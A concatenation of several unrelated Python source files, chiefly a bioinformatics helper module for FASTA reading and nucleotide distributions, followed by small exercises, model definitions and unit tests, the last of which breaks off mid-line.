<reponame>gieses/ARDEN #!/usr/bin/env python ''' Created 2012 Contains various help functions which read or produce an input/ output @author: <NAME> ''' import os import random import HTSeq def readdna(filename): """ Reads in the dna sequence of the given fasta @type filename: string @param filename: Fasta-file used as input. @rtype: HTSeq Sequence object @return: Reference Fasta. """ chr = HTSeq.FastaReader(filename) for fasta in chr: referenz = HTSeq.Sequence(fasta.seq,fasta.name) return(referenz) def writefile(sequenceObject,filename): """ Writes a given sequence object to a fasta file. @type sequenceObject: HTSeq Sequence object @param sequenceObject: Reference sequence as fasta. """ outfasta = open(filename,"w") sequenceObject.write_to_fasta_file(outfasta) outfasta.close() def writeoverview(Ndic_G,aadic_G,Ndic_AR,aadic_AR,filename): """ Creates the "delta" file for the comparison of the two chromosoms. This file contains the differences in nucleotide distribution between reference and artificial. input: nucleotid dictionary genom, aa dictionary genome, nucleotid dictionary artificial chromosom, aa dictionary, filename @type Ndic_G: dictionary @param Ndic_G: Nucleotid dictionary genom. @type aadic_G: dictionary @param aadic_G: AA dictionary genome. @type Ndic_AR: dictionary @param Ndic_AR: Nucleotid dictionary artificial. @type aadic_AR: dictionary @param aadic_AR: AA dictionary artificial @type filename: string @param filename: Output filename. 
""" fobj = open(filename,"w") fobj.write("NUC /AA \t Genom \t Artificial Reference \t Delta \n") sum1 =0 sum2= 0 for item in Ndic_G.keys(): fobj.write(item +"\t"+str(Ndic_G[item])+"\t"+str(Ndic_AR[item])+"\t"+str(Ndic_G[item]-Ndic_AR[item])+"\n") sum1 +=abs(Ndic_G[item]-Ndic_AR[item]) fobj.write(str(sum1)+"\n") for item in aadic_G.keys(): fobj.write(item +"\t"+str(aadic_G[item])+"\t"+str(aadic_AR[item])+"\t"+str(aadic_G[item]-aadic_AR[item])+"\n") sum2 +=abs(aadic_G[item]-aadic_AR[item]) fobj.write(str(sum2)+"\n") def nucleotide_dist_seq(seq,txt_file,shallwrite): """ Writes the nucleotide distribution in a file and returns the dictionary. adjust s for % results. @type seq: string @param seq: Nucleotide sequence. @type txt_file: string @param txt_file: Output compare file. @type shallwrite: Bool @param shallwrite: Decides if percentages values are written to the output. """ Nndic={"A":0,"C":0,"G":0,"T":0,"N":0} for i in range(0,len(seq)): Nndic[seq[i]]+=1 s=len(seq) s=1 if (shallwrite==1): output_file=open(txt_file,'w') for item in Nndic.keys(): Nndic[item]=Nndic[item]/float(s) output_file.write(item + "\t" + str(Nndic[item])+"\n") output_file.close() else: for item in Nndic.keys(): Nndic[item]=Nndic[item]/float(s) return (Nndic) #N can be used for checking: should be the same number in real # and artificial chromosome def aa_dist_seq(seq,txt_file,shallwrite): """ Writes the AA distribution in a file and returns the dictionary. adjust s for % results. @type seq: string @param seq: Nucleotide sequence. @type txt_file: string @param txt_file: Output compare file. @type shallwrite: Bool @param shallwrite: Write output in percentages.. 
""" aadic = {"A":0,"R":0,"N":0,"D":0,"C":0,"E":0,"Q":0,"G":0,"H":0,"I":0,"L":0,"K":0,"M":0,"F":0,"P":0,"S":0,"T":0,"W":0,"Y":0,"V":0,"*":0} for i in range(0,len(seq)): '''escape 'n' Sequences ''' if (seq[i] in aadic): aadic[seq[i]]+=1 else: continue n = len(seq) n=1 if (shallwrite==1): output_file=open(txt_file,'w') for item in aadic.keys(): aadic[item]=aadic[item]/float(n) output_file.write(item + "\t" + str(aadic[item])+"\n") output_file.close() else: for item in aadic.keys(): aadic[item]=aadic[item]/float(n) return (aadic) ''' input: DNA Sequence, outputfilename and 1/0 for writing/not writing outputfile ''' def nucleotide_dist_file(file_fasta,txt_file): """ Writes the DNA distribution in a file and returns the dictionary. adjust n for % results @type file_fasta: string @param file_fasta: DNA Sequence @type txt_file: string @param txt_file: Filename for output. """ input_file=open(file_fasta,'r') output_file=open(txt_file,'a') seq='' for line in input_file: if line[0]!='>': line=line.rstrip() seq+=line output_file.write(str(nucleotide_dist_seq(seq))) output_file.write('\n') output_file.close() input_file.close() '''gets the number of missmatches between 2 sequences input: orig sequence, decoy sequence ''' def gethammingdistance(original,artificial): """ Calculates the hamming distances between two sequences. @type original: list @param original: Nucleotide sequence from the reference. @type artificial: list @param artificial: Nucleotide sequence from the artificial reference. """ hamming = 0 not_hamming=0 for i in range(0,len(original)): if (original[i]!=artificial[i]): hamming +=1 else: not_hamming+=1 print ("#hamming distance REF-ART\t"+ str(hamming)) print ("avg. distance:\t" + str(len(original)/float(hamming))) print("###########################\r\n")
#!/usr/bin/env python ''' Created 2012 Contains various help functions which read or produce an input/ output @author: <NAME> ''' import os import random import HTSeq def readdna(filename): """ Reads in the dna sequence of the given fasta @type filename: string @param filename: Fasta-file used as input. @rtype: HTSeq Sequence object @return: Reference Fasta. """ chr = HTSeq.FastaReader(filename) for fasta in chr: referenz = HTSeq.Sequence(fasta.seq,fasta.name) return(referenz) def writefile(sequenceObject,filename): """ Writes a given sequence object to a fasta file. @type sequenceObject: HTSeq Sequence object @param sequenceObject: Reference sequence as fasta. """ outfasta = open(filename,"w") sequenceObject.write_to_fasta_file(outfasta) outfasta.close() def writeoverview(Ndic_G,aadic_G,Ndic_AR,aadic_AR,filename): """ Creates the "delta" file for the comparison of the two chromosoms. This file contains the differences in nucleotide distribution between reference and artificial. input: nucleotid dictionary genom, aa dictionary genome, nucleotid dictionary artificial chromosom, aa dictionary, filename @type Ndic_G: dictionary @param Ndic_G: Nucleotid dictionary genom. @type aadic_G: dictionary @param aadic_G: AA dictionary genome. @type Ndic_AR: dictionary @param Ndic_AR: Nucleotid dictionary artificial. @type aadic_AR: dictionary @param aadic_AR: AA dictionary artificial @type filename: string @param filename: Output filename. 
""" fobj = open(filename,"w") fobj.write("NUC /AA \t Genom \t Artificial Reference \t Delta \n") sum1 =0 sum2= 0 for item in Ndic_G.keys(): fobj.write(item +"\t"+str(Ndic_G[item])+"\t"+str(Ndic_AR[item])+"\t"+str(Ndic_G[item]-Ndic_AR[item])+"\n") sum1 +=abs(Ndic_G[item]-Ndic_AR[item]) fobj.write(str(sum1)+"\n") for item in aadic_G.keys(): fobj.write(item +"\t"+str(aadic_G[item])+"\t"+str(aadic_AR[item])+"\t"+str(aadic_G[item]-aadic_AR[item])+"\n") sum2 +=abs(aadic_G[item]-aadic_AR[item]) fobj.write(str(sum2)+"\n") def nucleotide_dist_seq(seq,txt_file,shallwrite): """ Writes the nucleotide distribution in a file and returns the dictionary. adjust s for % results. @type seq: string @param seq: Nucleotide sequence. @type txt_file: string @param txt_file: Output compare file. @type shallwrite: Bool @param shallwrite: Decides if percentages values are written to the output. """ Nndic={"A":0,"C":0,"G":0,"T":0,"N":0} for i in range(0,len(seq)): Nndic[seq[i]]+=1 s=len(seq) s=1 if (shallwrite==1): output_file=open(txt_file,'w') for item in Nndic.keys(): Nndic[item]=Nndic[item]/float(s) output_file.write(item + "\t" + str(Nndic[item])+"\n") output_file.close() else: for item in Nndic.keys(): Nndic[item]=Nndic[item]/float(s) return (Nndic) #N can be used for checking: should be the same number in real # and artificial chromosome def aa_dist_seq(seq,txt_file,shallwrite): """ Writes the AA distribution in a file and returns the dictionary. adjust s for % results. @type seq: string @param seq: Nucleotide sequence. @type txt_file: string @param txt_file: Output compare file. @type shallwrite: Bool @param shallwrite: Write output in percentages.. 
""" aadic = {"A":0,"R":0,"N":0,"D":0,"C":0,"E":0,"Q":0,"G":0,"H":0,"I":0,"L":0,"K":0,"M":0,"F":0,"P":0,"S":0,"T":0,"W":0,"Y":0,"V":0,"*":0} for i in range(0,len(seq)): '''escape 'n' Sequences ''' if (seq[i] in aadic): aadic[seq[i]]+=1 else: continue n = len(seq) n=1 if (shallwrite==1): output_file=open(txt_file,'w') for item in aadic.keys(): aadic[item]=aadic[item]/float(n) output_file.write(item + "\t" + str(aadic[item])+"\n") output_file.close() else: for item in aadic.keys(): aadic[item]=aadic[item]/float(n) return (aadic) ''' input: DNA Sequence, outputfilename and 1/0 for writing/not writing outputfile ''' def nucleotide_dist_file(file_fasta,txt_file): """ Writes the DNA distribution in a file and returns the dictionary. adjust n for % results @type file_fasta: string @param file_fasta: DNA Sequence @type txt_file: string @param txt_file: Filename for output. """ input_file=open(file_fasta,'r') output_file=open(txt_file,'a') seq='' for line in input_file: if line[0]!='>': line=line.rstrip() seq+=line output_file.write(str(nucleotide_dist_seq(seq))) output_file.write('\n') output_file.close() input_file.close() '''gets the number of missmatches between 2 sequences input: orig sequence, decoy sequence ''' def gethammingdistance(original,artificial): """ Calculates the hamming distances between two sequences. @type original: list @param original: Nucleotide sequence from the reference. @type artificial: list @param artificial: Nucleotide sequence from the artificial reference. """ hamming = 0 not_hamming=0 for i in range(0,len(original)): if (original[i]!=artificial[i]): hamming +=1 else: not_hamming+=1 print ("#hamming distance REF-ART\t"+ str(hamming)) print ("avg. distance:\t" + str(len(original)/float(hamming))) print("###########################\r\n")
en
0.649137
#!/usr/bin/env python Created 2012 Contains various help functions which read or produce an input/ output @author: <NAME> Reads in the dna sequence of the given fasta @type filename: string @param filename: Fasta-file used as input. @rtype: HTSeq Sequence object @return: Reference Fasta. Writes a given sequence object to a fasta file. @type sequenceObject: HTSeq Sequence object @param sequenceObject: Reference sequence as fasta. Creates the "delta" file for the comparison of the two chromosoms. This file contains the differences in nucleotide distribution between reference and artificial. input: nucleotid dictionary genom, aa dictionary genome, nucleotid dictionary artificial chromosom, aa dictionary, filename @type Ndic_G: dictionary @param Ndic_G: Nucleotid dictionary genom. @type aadic_G: dictionary @param aadic_G: AA dictionary genome. @type Ndic_AR: dictionary @param Ndic_AR: Nucleotid dictionary artificial. @type aadic_AR: dictionary @param aadic_AR: AA dictionary artificial @type filename: string @param filename: Output filename. Writes the nucleotide distribution in a file and returns the dictionary. adjust s for % results. @type seq: string @param seq: Nucleotide sequence. @type txt_file: string @param txt_file: Output compare file. @type shallwrite: Bool @param shallwrite: Decides if percentages values are written to the output. #N can be used for checking: should be the same number in real # and artificial chromosome Writes the AA distribution in a file and returns the dictionary. adjust s for % results. @type seq: string @param seq: Nucleotide sequence. @type txt_file: string @param txt_file: Output compare file. @type shallwrite: Bool @param shallwrite: Write output in percentages.. escape 'n' Sequences input: DNA Sequence, outputfilename and 1/0 for writing/not writing outputfile Writes the DNA distribution in a file and returns the dictionary. 
adjust n for % results @type file_fasta: string @param file_fasta: DNA Sequence @type txt_file: string @param txt_file: Filename for output. gets the number of missmatches between 2 sequences input: orig sequence, decoy sequence Calculates the hamming distances between two sequences. @type original: list @param original: Nucleotide sequence from the reference. @type artificial: list @param artificial: Nucleotide sequence from the artificial reference. ##########################\r\n")
3.245538
3
Aula 10/ex35.py
rafa-santana/Curso-Python
1
6618581
print('Digite o comprimento de 03 reta e descubra se podem formar um triângulo') a = float(input('Digite a primeira reta: ')) b = float(input('Digite a segunda reta: ')) c = float(input('Digite a terceira reta: ')) if a+b>c and a+c>b and b+c>a: print('As retas formam um triângulo!') else: print('As retas não formam um triângulo.')
print('Digite o comprimento de 03 reta e descubra se podem formar um triângulo') a = float(input('Digite a primeira reta: ')) b = float(input('Digite a segunda reta: ')) c = float(input('Digite a terceira reta: ')) if a+b>c and a+c>b and b+c>a: print('As retas formam um triângulo!') else: print('As retas não formam um triângulo.')
none
1
4.055905
4
tests/unit/tensorflow/parameters/test_multivariate_normal_parameter.py
chiragnagpal/probflow
134
6618582
import numpy as np import tensorflow as tf import tensorflow_probability as tfp from probflow.parameters import MultivariateNormalParameter tfd = tfp.distributions def is_close(a, b, tol=1e-3): return np.abs(a - b) < tol def test_MultivariateNormalParameter(): """Tests probflow.parameters.MultivariateNormalParameter""" # Create the parameter param = MultivariateNormalParameter(4) # kl_loss should still be scalar kl_loss = param.kl_loss() assert isinstance(kl_loss, tf.Tensor) assert kl_loss.ndim == 0 # posterior_mean should return mean sample1 = param.posterior_mean() sample2 = param.posterior_mean() assert sample1.ndim == 2 assert sample2.ndim == 2 assert sample1.shape[0] == 4 assert sample2.shape[0] == 4 assert sample1.shape[1] == 1 assert sample2.shape[1] == 1 assert np.all(sample1 == sample2) # posterior_sample should return samples sample1 = param.posterior_sample() sample2 = param.posterior_sample() assert sample1.ndim == 2 assert sample2.ndim == 2 assert sample1.shape[0] == 4 assert sample2.shape[0] == 4 assert np.all(sample1 != sample2) # posterior_sample should be able to return multiple samples sample1 = param.posterior_sample(10) sample2 = param.posterior_sample(10) assert sample1.ndim == 3 assert sample2.ndim == 3 assert sample1.shape[0] == 10 assert sample1.shape[1] == 4 assert sample2.shape[0] == 10 assert sample2.shape[1] == 4 assert np.all(sample1 != sample2) # prior_sample should be d-dimensional prior_sample = param.prior_sample() assert prior_sample.ndim == 2 assert prior_sample.shape[0] == 4 prior_sample = param.prior_sample(n=7) assert prior_sample.ndim == 3 assert prior_sample.shape[0] == 7 assert prior_sample.shape[1] == 4 # test slicing s = param[:-2] assert isinstance(s, tf.Tensor) assert s.ndim == 2 assert s.shape[0] == 2 assert s.shape[1] == 1 s = param[1] assert isinstance(s, tf.Tensor) assert s.ndim == 2 assert s.shape[0] == 1 assert s.shape[1] == 1 s = param[-1] assert isinstance(s, tf.Tensor) assert s.ndim == 2 assert s.shape[0] == 1 
assert s.shape[1] == 1
import numpy as np import tensorflow as tf import tensorflow_probability as tfp from probflow.parameters import MultivariateNormalParameter tfd = tfp.distributions def is_close(a, b, tol=1e-3): return np.abs(a - b) < tol def test_MultivariateNormalParameter(): """Tests probflow.parameters.MultivariateNormalParameter""" # Create the parameter param = MultivariateNormalParameter(4) # kl_loss should still be scalar kl_loss = param.kl_loss() assert isinstance(kl_loss, tf.Tensor) assert kl_loss.ndim == 0 # posterior_mean should return mean sample1 = param.posterior_mean() sample2 = param.posterior_mean() assert sample1.ndim == 2 assert sample2.ndim == 2 assert sample1.shape[0] == 4 assert sample2.shape[0] == 4 assert sample1.shape[1] == 1 assert sample2.shape[1] == 1 assert np.all(sample1 == sample2) # posterior_sample should return samples sample1 = param.posterior_sample() sample2 = param.posterior_sample() assert sample1.ndim == 2 assert sample2.ndim == 2 assert sample1.shape[0] == 4 assert sample2.shape[0] == 4 assert np.all(sample1 != sample2) # posterior_sample should be able to return multiple samples sample1 = param.posterior_sample(10) sample2 = param.posterior_sample(10) assert sample1.ndim == 3 assert sample2.ndim == 3 assert sample1.shape[0] == 10 assert sample1.shape[1] == 4 assert sample2.shape[0] == 10 assert sample2.shape[1] == 4 assert np.all(sample1 != sample2) # prior_sample should be d-dimensional prior_sample = param.prior_sample() assert prior_sample.ndim == 2 assert prior_sample.shape[0] == 4 prior_sample = param.prior_sample(n=7) assert prior_sample.ndim == 3 assert prior_sample.shape[0] == 7 assert prior_sample.shape[1] == 4 # test slicing s = param[:-2] assert isinstance(s, tf.Tensor) assert s.ndim == 2 assert s.shape[0] == 2 assert s.shape[1] == 1 s = param[1] assert isinstance(s, tf.Tensor) assert s.ndim == 2 assert s.shape[0] == 1 assert s.shape[1] == 1 s = param[-1] assert isinstance(s, tf.Tensor) assert s.ndim == 2 assert s.shape[0] == 1 
assert s.shape[1] == 1
en
0.408167
Tests probflow.parameters.MultivariateNormalParameter # Create the parameter # kl_loss should still be scalar # posterior_mean should return mean # posterior_sample should return samples # posterior_sample should be able to return multiple samples # prior_sample should be d-dimensional # test slicing
2.481728
2
app/models/voting.py
covega/enviro_papers
0
6618583
from sqlalchemy import (Column, Integer, Enum, Float, ForeignKey, Sequence, String, Text) from app.models import Base import enum class VotingClassification(enum.Enum): PRO_ENVIRONMENT = "+" # Vote for the environment ANTI_ENVIRONMENT = "-" # Vote against the environment EXCUSED = "E" # Excused from Vote ABSENT = "A" # Unexcused Absence from Vote PRESENT = "P" # Present, Not Voting UNKNOWN = "N/A" class VotingAction(enum.Enum): YES = "YES" NO = "NO" @classmethod def fuzzy_cast(cls, s): out = None try: out = cls(s) except ValueError: if s.startswith(cls.YES.value): out = cls.YES elif s.startswith(cls.NO.value): out = cls.NO return out class Party(enum.Enum): DEMOCRAT = "D" REPUBLICAN = "R" INDEPENDANT = "I" class VotingRecord(Base): __tablename__ = 'voting_record' id = Column(Integer, Sequence('voting_record_id_seq'), primary_key=True) district_shortcode = Column(String(50), ForeignKey('district.shortcode'), nullable=False) legislator_name = Column(String(50), nullable=False) vote_fulltext = Column(Text, nullable=False) def __repr__(self): return "<VotingRecord(district_shortcode='%s', legislator_name='%s')>" % ( self.district_shortcode, self.legislator_name) class Bill(Base): __tablename__ = 'bill' id = Column(Integer, Sequence('bill_id_seq'), primary_key=True) state = Column(String(2), ForeignKey('state.abbr'), nullable=False) pro_environment_decision = Column(Enum(VotingAction)) title = Column(String(200), nullable=False) code = Column(String(50)) description = Column(Text) outcome = Column(String(50)) def __repr__(self): return "<Bill(state='%s', code='%s', title='%s')>" % ( self.state, self.code, self.title) class Vote(Base): __tablename__ = 'vote' id = Column(Integer, Sequence('vote_id_seq'), primary_key=True) district_shortcode = Column(String(50), ForeignKey('district.shortcode'), nullable=False) legislator_name = Column(String(50), nullable=False) classification = Column(Enum(VotingClassification), nullable=False) bill_id = Column(Integer, 
ForeignKey('bill.id'), nullable=False) year = Column(Integer, nullable=False) party = Column(Enum(Party)) year_score = Column(Float) lifetime_score = Column(Float) def __repr__(self): return "<Vote(district_shortcode='%s', legislator_name='%s')>" % ( self.district_shortcode, self.legislator_name) class DistrictIncumbentVote(Base): __tablename__ = 'district_incumbent_vote' id = Column(Integer, Sequence('district_incumbent_vote_id_seq'), primary_key=True) district_shortcode = Column(String(50), ForeignKey('district.shortcode'), nullable=False) legislator_name = Column(String(50), nullable=False) classification = Column(Enum(VotingClassification), nullable=False) bill_id = Column(Integer, ForeignKey('bill.id'), nullable=False) bill_pro_environment_decision = Column(Enum(VotingAction)) bill_title = Column(String(200), nullable=False) bill_code = Column(String(50)) bill_description = Column(Text) year = Column(Integer, nullable=False) def __repr__(self): return "<DistrictIncumbentVote(district_shortcode='%s', legislator_name='%s', bill_id='%d')>" % ( self.district_shortcode, self.legislator_name, self.bill_id)
from sqlalchemy import (Column, Integer, Enum, Float, ForeignKey, Sequence, String, Text) from app.models import Base import enum class VotingClassification(enum.Enum): PRO_ENVIRONMENT = "+" # Vote for the environment ANTI_ENVIRONMENT = "-" # Vote against the environment EXCUSED = "E" # Excused from Vote ABSENT = "A" # Unexcused Absence from Vote PRESENT = "P" # Present, Not Voting UNKNOWN = "N/A" class VotingAction(enum.Enum): YES = "YES" NO = "NO" @classmethod def fuzzy_cast(cls, s): out = None try: out = cls(s) except ValueError: if s.startswith(cls.YES.value): out = cls.YES elif s.startswith(cls.NO.value): out = cls.NO return out class Party(enum.Enum): DEMOCRAT = "D" REPUBLICAN = "R" INDEPENDANT = "I" class VotingRecord(Base): __tablename__ = 'voting_record' id = Column(Integer, Sequence('voting_record_id_seq'), primary_key=True) district_shortcode = Column(String(50), ForeignKey('district.shortcode'), nullable=False) legislator_name = Column(String(50), nullable=False) vote_fulltext = Column(Text, nullable=False) def __repr__(self): return "<VotingRecord(district_shortcode='%s', legislator_name='%s')>" % ( self.district_shortcode, self.legislator_name) class Bill(Base): __tablename__ = 'bill' id = Column(Integer, Sequence('bill_id_seq'), primary_key=True) state = Column(String(2), ForeignKey('state.abbr'), nullable=False) pro_environment_decision = Column(Enum(VotingAction)) title = Column(String(200), nullable=False) code = Column(String(50)) description = Column(Text) outcome = Column(String(50)) def __repr__(self): return "<Bill(state='%s', code='%s', title='%s')>" % ( self.state, self.code, self.title) class Vote(Base): __tablename__ = 'vote' id = Column(Integer, Sequence('vote_id_seq'), primary_key=True) district_shortcode = Column(String(50), ForeignKey('district.shortcode'), nullable=False) legislator_name = Column(String(50), nullable=False) classification = Column(Enum(VotingClassification), nullable=False) bill_id = Column(Integer, 
ForeignKey('bill.id'), nullable=False) year = Column(Integer, nullable=False) party = Column(Enum(Party)) year_score = Column(Float) lifetime_score = Column(Float) def __repr__(self): return "<Vote(district_shortcode='%s', legislator_name='%s')>" % ( self.district_shortcode, self.legislator_name) class DistrictIncumbentVote(Base): __tablename__ = 'district_incumbent_vote' id = Column(Integer, Sequence('district_incumbent_vote_id_seq'), primary_key=True) district_shortcode = Column(String(50), ForeignKey('district.shortcode'), nullable=False) legislator_name = Column(String(50), nullable=False) classification = Column(Enum(VotingClassification), nullable=False) bill_id = Column(Integer, ForeignKey('bill.id'), nullable=False) bill_pro_environment_decision = Column(Enum(VotingAction)) bill_title = Column(String(200), nullable=False) bill_code = Column(String(50)) bill_description = Column(Text) year = Column(Integer, nullable=False) def __repr__(self): return "<DistrictIncumbentVote(district_shortcode='%s', legislator_name='%s', bill_id='%d')>" % ( self.district_shortcode, self.legislator_name, self.bill_id)
en
0.936143
# Vote for the environment # Vote against the environment # Excused from Vote # Unexcused Absence from Vote # Present, Not Voting
2.568624
3
makahiki/apps/widgets/prizes/forms.py
justinslee/Wai-Not-Makahiki
1
6618584
''' Forms for Prizes. Created on Nov 4, 2012 @author: <NAME> ''' from django import forms from apps.managers.challenge_mgr.models import RoundSetting class ChangePrizeRoundForm(forms.Form): """change prize round form.""" round_choice = forms.ModelChoiceField(queryset=RoundSetting.objects.all(), required=True)
''' Forms for Prizes. Created on Nov 4, 2012 @author: <NAME> ''' from django import forms from apps.managers.challenge_mgr.models import RoundSetting class ChangePrizeRoundForm(forms.Form): """change prize round form.""" round_choice = forms.ModelChoiceField(queryset=RoundSetting.objects.all(), required=True)
en
0.91477
Forms for Prizes. Created on Nov 4, 2012 @author: <NAME> change prize round form.
2.886361
3
tests/database/test_get_query.py
constructpm/pysyncgateway
2
6618585
<reponame>constructpm/pysyncgateway<filename>tests/database/test_get_query.py from pysyncgateway import Query def test(database): result = database.get_query('test') assert result == Query(database, 'test')
from pysyncgateway import Query def test(database): result = database.get_query('test') assert result == Query(database, 'test')
none
1
2.1037
2
code/ch04/4.2.1.24game.py
leetcode-pp/leetcode-pp1
22
6618586
<reponame>leetcode-pp/leetcode-pp1<gh_stars>10-100 from typing import List class Solution: def judgePoint24(self, nums: List[int]) -> bool: permutations = self.permuteUnique(nums) for permutation in permutations: if self.compute(permutation): return True return False def compute(self, nums: List[float]) -> bool: if len(nums) == 1: return abs(nums[0] - 24) <= 0.00001 for i in range(len(nums) - 1): # compute possible result from + - * / tmp = [] tmp.append(nums[i] + nums[i + 1]) tmp.append(nums[i] - nums[i + 1]) tmp.append(nums[i] * nums[i + 1]) if nums[i + 1] != 0: tmp.append(nums[i] / nums[i + 1]) for num in tmp: new_list = nums[:] new_list[i] = num new_list.pop(i + 1) if self.compute(new_list): return True return False def permuteUnique(self, nums: List[int]) -> List[List[int]]: permutations = [] nums.sort() tmp = [] visited = [False] * len(nums) self.backtracking(nums, tmp, visited, permutations) return permutations def backtracking( self, nums: List[int], tmp: List[float], visited: List[bool], perm: List[int], ) -> None: if len(nums) == len(tmp): perm.append(tmp[:]) return for i in range(len(nums)): if visited[i]: continue if i > 0 and nums[i] == nums[i - 1] and not visited[i - 1]: continue visited[i] = True tmp.append(nums[i]) self.backtracking(nums, tmp, visited, perm) visited[i] = False tmp.pop()
from typing import List class Solution: def judgePoint24(self, nums: List[int]) -> bool: permutations = self.permuteUnique(nums) for permutation in permutations: if self.compute(permutation): return True return False def compute(self, nums: List[float]) -> bool: if len(nums) == 1: return abs(nums[0] - 24) <= 0.00001 for i in range(len(nums) - 1): # compute possible result from + - * / tmp = [] tmp.append(nums[i] + nums[i + 1]) tmp.append(nums[i] - nums[i + 1]) tmp.append(nums[i] * nums[i + 1]) if nums[i + 1] != 0: tmp.append(nums[i] / nums[i + 1]) for num in tmp: new_list = nums[:] new_list[i] = num new_list.pop(i + 1) if self.compute(new_list): return True return False def permuteUnique(self, nums: List[int]) -> List[List[int]]: permutations = [] nums.sort() tmp = [] visited = [False] * len(nums) self.backtracking(nums, tmp, visited, permutations) return permutations def backtracking( self, nums: List[int], tmp: List[float], visited: List[bool], perm: List[int], ) -> None: if len(nums) == len(tmp): perm.append(tmp[:]) return for i in range(len(nums)): if visited[i]: continue if i > 0 and nums[i] == nums[i - 1] and not visited[i - 1]: continue visited[i] = True tmp.append(nums[i]) self.backtracking(nums, tmp, visited, perm) visited[i] = False tmp.pop()
en
0.619534
# compute possible result from + - * /
3.136164
3
kyu_5/tic_tac_toe_checker/test_checker.py
ikostan/codewars
1
6618587
""" Testing is_solved function """ # Created by <NAME>. # GitHub: https://github.com/ikostan # LinkedIn: https://www.linkedin.com/in/egor-kostan/ # ALGORITHMS ARRAYS import allure import unittest from utils.log_func import print_log from kyu_5.tic_tac_toe_checker.checker import is_solved @allure.epic('5 kyu') @allure.parent_suite('Novice') @allure.suite('Algorithms') @allure.sub_suite("Unit Tests") @allure.feature('Lists') @allure.story('Tic-Tac-Toe Checker') @allure.tag('ALGORITHMS', 'ARRAY') @allure.link(url='https://www.codewars.com/kata/525caa5c1bf619d28c000335/train/python', name='Source/Kata') class IsSolvedTestCase(unittest.TestCase): """ Testing is_solved function """ def test_is_solved(self): """ Testing is_solved function The function should return whether the board's current state is solved. We want our function to return: -1 if the board is not yet finished (there are empty spots), 1 if "X" won, 2 if "O" won, 0 if it's a cat's game (i.e. a draw). """ allure.dynamic.title("Testing done_or_not function") allure.dynamic.severity(allure.severity_level.NORMAL) allure.dynamic.description_html('<h3>Codewars badge:</h3>' '<img src="https://www.codewars.com/users/myFirstCode' '/badges/large">' '<h3>Test Description:</h3>' "<p>The function should return whether the board's " "current state is solved.</p>") test_data = ( ([[0, 0, 1], [0, 1, 2], [2, 1, 0]], -1, 'not yet finished'), ([[1, 1, 1], [0, 2, 2], [0, 0, 0]], 1, 'winning row'), ([[2, 1, 2], [2, 1, 1], [1, 1, 2]], 1, 'winning column'), ([[2, 1, 2], [2, 1, 1], [1, 2, 1]], 0, 'draw'), ([[1, 2, 0], [0, 1, 2], [0, 0, 1]], 1, 'wining diagonal' ) ) for board, expected, message in test_data: result = is_solved(board) with allure.step("Enter Tic-Tac-Toe board and verify the output."): print_log(expected=expected, result=result, message=message) self.assertEqual(expected, result, msg=message)
""" Testing is_solved function """ # Created by <NAME>. # GitHub: https://github.com/ikostan # LinkedIn: https://www.linkedin.com/in/egor-kostan/ # ALGORITHMS ARRAYS import allure import unittest from utils.log_func import print_log from kyu_5.tic_tac_toe_checker.checker import is_solved @allure.epic('5 kyu') @allure.parent_suite('Novice') @allure.suite('Algorithms') @allure.sub_suite("Unit Tests") @allure.feature('Lists') @allure.story('Tic-Tac-Toe Checker') @allure.tag('ALGORITHMS', 'ARRAY') @allure.link(url='https://www.codewars.com/kata/525caa5c1bf619d28c000335/train/python', name='Source/Kata') class IsSolvedTestCase(unittest.TestCase): """ Testing is_solved function """ def test_is_solved(self): """ Testing is_solved function The function should return whether the board's current state is solved. We want our function to return: -1 if the board is not yet finished (there are empty spots), 1 if "X" won, 2 if "O" won, 0 if it's a cat's game (i.e. a draw). """ allure.dynamic.title("Testing done_or_not function") allure.dynamic.severity(allure.severity_level.NORMAL) allure.dynamic.description_html('<h3>Codewars badge:</h3>' '<img src="https://www.codewars.com/users/myFirstCode' '/badges/large">' '<h3>Test Description:</h3>' "<p>The function should return whether the board's " "current state is solved.</p>") test_data = ( ([[0, 0, 1], [0, 1, 2], [2, 1, 0]], -1, 'not yet finished'), ([[1, 1, 1], [0, 2, 2], [0, 0, 0]], 1, 'winning row'), ([[2, 1, 2], [2, 1, 1], [1, 1, 2]], 1, 'winning column'), ([[2, 1, 2], [2, 1, 1], [1, 2, 1]], 0, 'draw'), ([[1, 2, 0], [0, 1, 2], [0, 0, 1]], 1, 'wining diagonal' ) ) for board, expected, message in test_data: result = is_solved(board) with allure.step("Enter Tic-Tac-Toe board and verify the output."): print_log(expected=expected, result=result, message=message) self.assertEqual(expected, result, msg=message)
en
0.768003
Testing is_solved function # Created by <NAME>. # GitHub: https://github.com/ikostan # LinkedIn: https://www.linkedin.com/in/egor-kostan/ # ALGORITHMS ARRAYS Testing is_solved function Testing is_solved function The function should return whether the board's current state is solved. We want our function to return: -1 if the board is not yet finished (there are empty spots), 1 if "X" won, 2 if "O" won, 0 if it's a cat's game (i.e. a draw).
3.039385
3
wlra/tests/test_wlra.py
aksarkar/wlra
7
6618588
<reponame>aksarkar/wlra import numpy as np import os import pickle import pytest import scipy.stats as st import wlra from fixtures import * # This is needed to get functions not publicly exported from wlra.wlra import lra from wlra.nmf import nmf def test_lra_shape(): x = np.zeros((100, 200)) res = lra(x, rank=1) assert res.shape == (100, 200) def test_lra_value(): np.random.seed(0) x = np.random.normal(size=(100, 200)) res = lra(x, rank=1) u, d, vt = np.linalg.svd(x, full_matrices=False) res0 = u[:,:1].dot(vt[:1]) * d[0] # Important: numpy/scipy give differences which can differ considerably for # individual elements. Instead, check that the objective values are close assert np.isclose(np.linalg.norm(x - res), np.linalg.norm(x - res0), atol=0.1) def test_wlra_shape(): x = np.zeros((100, 200)) w = np.ones((100, 200)) res = wlra.wlra(x, w, rank=1) assert res.shape == (100, 200) def test_wlra_unit_weight(): np.random.seed(0) x = np.random.normal(size=(100, 200)) res = wlra.wlra(x, w=1, rank=1) res0 = lra(x, rank=1) assert np.isclose(res, res0).all() def test_wlra_rank_2(): np.random.seed(0) x = np.random.normal(size=(100, 200)) res = wlra.wlra(x, w=1, rank=2) res0 = lra(x, rank=2) assert np.isclose(res, res0).all() def test_wlra_missing(simulate): x, eta = simulate w = (np.random.uniform(size=x.shape) < 0.1).astype(float) wlra.wlra(x, w, rank=3) def test_plra_shape(): x = np.ones((100, 200)) res = wlra.plra(x, 1) assert res.shape == (100, 200) def test_plra_assume_rank_1(): x = np.random.poisson(lam=np.exp(np.random.normal(size=(100, 200)))) res = wlra.plra(x, 1) def test_plra_oracle(simulate): x, eta = simulate l1 = st.poisson(mu=np.exp(wlra.plra(x, rank=3, max_outer_iters=100, check_converged=True))).logpmf(x).sum() l0 = 